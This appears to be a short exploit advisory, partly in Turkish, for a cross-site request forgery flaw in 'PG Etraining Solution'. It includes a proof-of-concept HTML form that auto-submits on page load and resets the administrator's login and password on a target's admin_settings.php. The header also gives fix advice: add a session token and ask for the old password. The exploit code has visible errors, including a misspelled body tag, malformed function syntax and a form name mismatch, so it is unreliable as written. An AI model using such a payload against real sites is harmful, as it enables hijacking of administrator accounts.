< ------------------- header data start ------------------- >

#############################################################

# Application Name : PG Etraining Solution

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/n0x

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.n0x.submit();}</script>

<form action=http://www.site.com/PATCH/admin/admin_settings.php method=post name=data>
<input type=hidden name=sel value=1>
<input type=hidden name=par value=change>

<input type=hidden class=inpBox value=Administrator name=name maxlength=60 size=40>
<input type=hidden class=inpBox value= name=surename maxlength=60 size=40>
<input name=phone class=inpBox type=hidden value=011-111-1112 maxlength=60 size=40>
<input name=email class=inpBox type=hidden value=[email protected] maxlength=60 size=40>
<input type=hidden class=inpBox value=London name=city maxlength=60 size=40>
<select class=hidden name=countryid size=1><option label=Afghanistan value=1></option>
<input type=hidden class=inpBox value=PG Etraining Solution name=company maxlength=40 size=40>

<input type=hidden class=inpBox value=add name=login size=40>
<input type=hidden class=inpBox name=password size=40 value=add>
<input type=submit value=create name=B1>


< -- bug code end of -- >